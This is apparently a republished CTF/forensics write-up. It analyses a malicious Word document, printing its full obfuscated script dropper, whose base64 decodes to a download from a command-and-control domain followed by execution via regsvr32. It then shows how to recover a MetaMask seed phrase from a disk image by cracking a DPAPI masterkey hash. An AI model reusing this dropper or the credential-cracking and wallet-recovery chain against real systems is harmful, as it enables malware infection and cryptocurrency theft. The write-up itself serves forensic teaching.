Press enter or click to view image in full sizewe got a malicious document file, have macros and oth 2026-6-15 15:17:14 Author: infosecwriteups.com(查看原文) 阅读量:1 收藏
Press enter or click to view image in full size
we got a malicious document file, have macros and other stuff.
first step is to extract the document file “Invoice_Q1–2021.doc” as any other zip, rar file:
Press enter or click to view image in full size
and so on. after extracting the file, we can view all malicious stuff.
starting with “Invoice_Q1–2021\word\vbaData.xml” file, we can get the full MacroName, which is “PROJECT.AYAIQ5.AUTOOPEN”
Press enter or click to view image in full size
moving on another “Invoice_Q1–2021\word\document.xml” we can see a lot of malicious stuff, that needs more investigation:
Press enter or click to view image in full size
<w:t><html><body><div id="content">hello</div><script language="javascript">var aWKdF = "a9oLN";function aUgasq(awFTPc){var aD07t = "a0EKB";acWBi = aD07t.toLowerCase();var aPWzqv = false;var aD0Mks = -41878;return(new ActiveXObject(awFTPc));}ae1Al = -8406;var azd3Iw = -28262;abKXU = "aYUGr";function aUrMf(aQPiI){var e={},i,b=0,c,x,l=0,a,a8qHR="",w=String.fromCharCode,L=aQPiI.length;var A="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";for(i=0;i<64;i++){e[A.charAt(i)]=i;}for(x=0;x<L;x++){c=e[aQPiI.charAt(x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(a8qHR+=w(a));}}return(a8qHR);};a0chb2 = false;aPCUL7 = window;a1oWCZ = -33192;aBd7i = document;var aXhVs = "apKsW";aPCUL7.resizeTo(1, 1);aupXs7 = false;aXRTl2 = true;aPCUL7.moveTo(-100, -100);aJM8V1 = -49805;var amlU3 = -36589;var aTnbMl = 41478;var aTqS3V = "act038";var aKI6ix = aTqS3V.toLowerCase();aae3kO = 32908;aITus4 = "aoXe2L";var aDUOYP = aITus4.toString();var a3KlRp = aUrMf("CQkJCQkJdmFyIGFzeWRPcSA9IG5ldyBBY3RpdmVYT2JqZWN0KCJtc3htbDIueG1saHR0cCIpOw0KCQkJCQkJYXN5ZE9xLm9wZW4oIkdFVCIsICJodHRwOi8vNXRoYXQ2LmNvbS9hc3NldHMvNTVkZGI3NzUvY2U1MTAyNWIxMi85Yjc1YmJjZS84YTA2ZmQ0Ny82YWM4NGU3NDI0YjA1MzkyODY1NjJiL3h0dWFxMTQ/YW56PTEyNWM1OTA5JmRsendnPTdhZWMxNjdhNWEyYWIwJmJ1PWEwOWY3NDAiLCBmYWxzZSk7DQoJCQkJCQlhc3lkT3Euc2VuZCgpOw0KDQoJCQkJCQlpZihhc3lkT3Euc3RhdHVzID09IDIwMCkNCgkJCQkJCXsNCgkJCQkJCQl2YXIgYWJVc1ggPSBuZXcgQWN0aXZlWE9iamVjdCgiYWRvZGIuc3RyZWFtIik7DQoJCQkJCQkJYWJVc1gub3BlbjsNCgkJCQkJCQlhYlVzWC50eXBlID0gMTsNCgkJCQkJCQlhYlVzWC53cml0ZShhc3lkT3EucmVzcG9uc2Vib2R5KTsNCgkJCQkJCQlhYlVzWC5zYXZldG9maWxlKCJjOlxccHJvZ3JhbWRhdGFcXGFaZTRJLnRtcCIsIDIpOw0KCQkJCQkJCWFiVXNYLmNsb3NlOw0KCQkJCQkJfQ==");var aE1HIO = aUrMf("CQkJCQkJCW5ldyBBY3RpdmVYT2JqZWN0KCJ3c2NyaXB0LnNoZWxsIikucnVuKCJyZWdzdnIzMiBjOlxccHJvZ3JhbWRhdGFcXGFaZTRJLnRtcCIpOw0KCQkJCQkJCXZhciBhRVFicFUgPSBuZXcgQWN0aXZlWE9iamVjdCgic2NyaXB0aW5nLmZpbGVzeXN0ZW1vYmplY3QiKTsNCgkJCQkJCQlhRVFicFUuZGVsZXRlZmlsZSgiYzpcXHByb2dyYW1kYXRhXFxhWmU0SS5odGEiKTs=");</script><script language="javascript">var a4EQx = -19950;function aQ3AaU(a71O9o){var an6WK = "aRLg9";var a5X0Gz = an6WK.toLowerCase();var a8B3lh = "aSwVuU";aUaQNt = a8B3lh.toLowerCase();var akSl73 = aUgasq("msscriptcontrol.scriptcontrol");arCgh1 = "aHX0J";akSl73.Language = "jscript";var aM86j = true;aVTiFm = -35420;akSl73.Timeout = 60000;amH0b = true;axXiRp = true;akSl73.AddCode(a71O9o);axGBr = 38917;var a30g4 = true;return(null);}</script><script language="vbscript">aQ3AaU a3KlRp : aQ3AaU aE1HIO : aPCUL7.close</script></body></html></w:t>after investigation, we can see 2 big encoded base64 text:
CQkJCQkJdmFyIGFzeWRPcSA9IG5ldyBBY3RpdmVYT2JqZWN0KCJtc3htbDIueG1saHR0cCIpOw0KCQkJCQkJYXN5ZE9xLm9wZW4oIkdFVCIsICJodHRwOi8vNXRoYXQ2LmNvbS9hc3NldHMvNTVkZGI3NzUvY2U1MTAyNWIxMi85Yjc1YmJjZS84YTA2ZmQ0Ny82YWM4NGU3NDI0YjA1MzkyODY1NjJiL3h0dWFxMTQ/YW56PTEyNWM1OTA5JmRsendnPTdhZWMxNjdhNWEyYWIwJmJ1PWEwOWY3NDAiLCBmYWxzZSk7DQoJCQkJCQlhc3lkT3Euc2VuZCgpOw0KDQoJCQkJCQlpZihhc3lkT3Euc3RhdHVzID09IDIwMCkNCgkJCQkJCXsNCgkJCQkJCQl2YXIgYWJVc1ggPSBuZXcgQWN0aXZlWE9iamVjdCgiYWRvZGIuc3RyZWFtIik7DQoJCQkJCQkJYWJVc1gub3BlbjsNCgkJCQkJCQlhYlVzWC50eXBlID0gMTsNCgkJCQkJCQlhYlVzWC53cml0ZShhc3lkT3EucmVzcG9uc2Vib2R5KTsNCgkJCQkJCQlhYlVzWC5zYXZldG9maWxlKCJjOlxccHJvZ3JhbWRhdGFcXGFaZTRJLnRtcCIsIDIpOw0KCQkJCQkJCWFiVXNYLmNsb3NlOw0KCQkJCQkJfQ==CQkJCQkJCW5ldyBBY3RpdmVYT2JqZWN0KCJ3c2NyaXB0LnNoZWxsIikucnVuKCJyZWdzdnIzMiBjOlxccHJvZ3JhbWRhdGFcXGFaZTRJLnRtcCIpOw0KCQkJCQkJCXZhciBhRVFicFUgPSBuZXcgQWN0aXZlWE9iamVjdCgic2NyaXB0aW5nLmZpbGVzeXN0ZW1vYmplY3QiKTsNCgkJCQkJCQlhRVFicFUuZGVsZXRlZmlsZSgiYzpcXHByb2dyYW1kYXRhXFxhWmU0SS5odGEiKTs=
Now let’s take a look on cyberchef, we can answer all other question immediately:
Press enter or click to view image in full size
c2 domain: 5that6[.]com
payload file name: aZe4I.tmp
system utility used for execution: regsvr32
Press enter or click to view image in full size
we have a disk image “image.ad1” file, that starts its partition from “C:\Users\tarok\AppData”. so we don’t have so much to see here.
I systematically examined all files within the disk image, found the “UsrClass.dat” file, which resides in “C:\Users\tarok\AppData\Local\Microsoft\Windows\UsrClass.dat”.
it contains settings for apps and Windows shell (e.g., recent files, UI customizations) and so on for each user.
opening the BagMru key path, which resides in “UsrClass.dat:
Local Settings\Software\Microsoft\Windows\Shell\BagMRU\”
found something very interesting that attracted my eyes directly
found this in reg path “UsrClass.dat: Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1”
we need a deep investigation so let’s dig deeper with ShellBags Explorer by the GOAT Eric Zimmerman
Load offline Hive but remember — You must dump it’s log file “UsrClass.dat.LOG1” to parse correctly
After an extensive investigation on the provided disk image we have here,
Get Loay Salah’s stories in your inbox
Join Medium for free to get updates from this writer.
Initially, I examined all web browser data. While the Edge history database yielded no results, I identified an interesting visited websites in Firefox’s history database C:\Users\Wh1pl4sh\AppData\Roaming\Mozilla\Firefox\fvdbjn8o.default-release\places.sqlite
Press enter or click to view image in full size
found that he searched for “metamask”, which is a cryptocurrency wallet and browser extension that lets users manage Ethereum-based assets and interact with decentralized applications (dApps)
He also searched for a very important medium link of how to get the seed phrase.
we got a very important insight of what we are looking for exactly, and a very valuable website can be used to decrypt the data we are seeking of
With more deep investigation, i discovered the “metamask” extension in the default Firefox profile located at: C:\Users\Wh1pl4sh\AppData\Roaming\Mozilla\Firefox\fvdbjn8o.default-release\storage\default\<HERE>
It’s time to research, i’ve searched about how to recover my secret recovery phrase correctly, and found this precocious link, which is from metamask support themselves.
reading the firefox section carefully, we can see how to retrieve the data correctly step by step, but i have a better idea.
with more and more investigation, we can only get the correct database that contains the encrypted data, instead of what the support say exactly.
after a lot of digging, i found the database that contains the encrypted data:
C:\Users\Wh1pl4sh\AppData\Roaming\Mozilla\Firefox\fvdbjn8o.default-release\storage\default\moz-extension+++9d43d20e-c6b8-4b71-b6ad-5a503dedc147\idb\3117620802mpeutkacmaabs-k.sqlite
Press enter or click to view image in full size
The keys are Caesar Ciphered as follows:
Press enter or click to view image in full size
our encrypted vault are in “0KeyringController”, let’s take a look:
{"data":"FF+4Fwzlmqu5/v85xYso8fgUQR6uRybNx6t5yhwIRmb4omPFYNP2q6qsKsu7vXAWi8PMWQzZYjCH8dOazNMV/W8RWau78EkZDJoILIW9vhKONrjd1EsTG3Ywi+hFxOlZAAsPLlGY13QfEDAfaKjBrligdhtzziOTPo7Quu16nwwjGigJxSJrD7DRNP4+Jw1dgatFD2iWSjy5DgzMWHbiAFvo436OYYUOirz95u/nF7HsI9Zz39RKC12uasViHytKBs/oAzEhqy8PCqdVwNQD4fbgoGSJqO9Up1etA5nj+ETYhIg900kh3L58LoeTbDTU8wK/wD3PPVrxMmMOKUmP6TwDhPG2FY92YTgqLXP7t/w3Is85sEUh0fsPdSTnFV3HVYDLMBOqJCRVe1iyzIvEj/l/T7yMzXHZdIrNtR+3hIo6k3Ep3izwzZaExkHbsIoJQiCjQoDcmo8nRltE54FU1ijdQCtd94yk7gx2/5g5ycAekBOj9tMyNXpL9zPdkvHgvbi1wOP1BsE/+Rftj5OJtQVpQ14Mb91FznyB37OUMU/D996ltEfd2A6hfEF+D0Vros/UDYkaxL0urTmy6GEJUPKkyftDLFRfmypyxzlrPFGhwMUpEycVXNiVu7YN1Il3CD5cFM88jDNmvyIGWru9YRsF1jIuvhEeF2YWQ7YSc0vnQZExCWhHQFPS33CGq/8CoADwSEzqaWxgYM04CsAeA68aqZTNZgBFYexaLsnu09V+aNYCXHLjAmB52lMVOy0v42d1S21zQ4rr862Rt+a3mTGVmtGvITd3w2vPREoxZcEbeW89R//vSmjLwW0+KQVD6mlLKzo5o9pS7+NJhgivF/KZUDnyMSLdMDf9IzrazOvIRUXWgQOLr86YpJ/GE2w/Hq1UZRldvEEg6YOs6tmOEQjR/4+xeQaLRpWO9bs8/KmQFljSOQOgkQfXqileC0q+vz+619fFHBYZMoEKVOKfDZFf/A5oeXfx5oE2tLb9t4MGkS9YGQC0lPNA+DVELYPPKqlK24/GQ7ceWimbCDDEdbLHxNe/CRr1GEf2s1SBdRaoeYS7EQnay1Uo/vEym+ConX5jlFHBixtmqwXq3cZP41eV6RIykYcx+sW9CACJDZvn6xs8kXSHbmHWy4vJqcOUbSsVnYPTyqFep1mCxtqU0fXXJAVFB1sVfVsf3oF/eZxrgS+CEDE91NMoyhdNVLPohd/fs6BUk9kr+1rqE5HsU+UqTaFaLLjgwOIHvVnqk9Boto7zonIAVTq6BPM/nZengxIYRoFee7e5ddVzCmcSR+SexxVU7/ctRuHMBPKtGmU49pvqU1JL8YBCRaZOwoFyKbMYc3hEOfjfkKLExLrU/Gcmq5or180YiMoPa5Cq+nPoj1ByXq1KP4JBjZ89Tlj7d+Q0eUaMO3IqhmDx+181FVwb9wUQtKkzWdL3Ie8We1sX9/VS0AdL3lyw7Sb2G73MMEOUzhrMuJ7rrToRAw==","iv":"NJ5Mq2Azg7GzwgKc8ZgXDA==","keyMetadata":{"algorithm":"PBKDF2","params":{"iterations":600000}},"salt":"AZBa8AhppeaO1hoa1PyhIgUViSH3CF8urWwW2OxkHtg="}now let’s hop on MetaMask Vault Decryptor
Press enter or click to view image in full size
now we need to get the correct password. Since SAM registry file was deleted, we don’t have any other option to get the password, except “DPAPI”
Windows API that encrypts user secrets using the user’s login password; stored in AppData\Roaming\Microsoft\Protect\<SID> as AES-encrypted masterkeys.
So, we need the user’s DPAPI masterkey file : AppData\Roaming\Microsoft\Protect\S-1-5-21-2430665207-3300790704-3908932582-1001\a3ef4996-d3ea-422c-9de1-62931c21fb47and the user SID: S-1-5-21-2430665207-3300790704-3908932582-1001to extract a hash for password cracking. since we have both, let’s get to kali machine quickly.
we have DPAPImk2john tool that can significantly simplify our work.
Press enter or click to view image in full size
Press enter or click to view image in full size
Press enter or click to view image in full size
Now we got everything, let’s head back to MetaMask Vault Decryptor with password “iloveyou2”, and decrypt the vault to get the Secret Backup Phrase
Press enter or click to view image in full size
如有侵权请联系:admin#unsafe.sh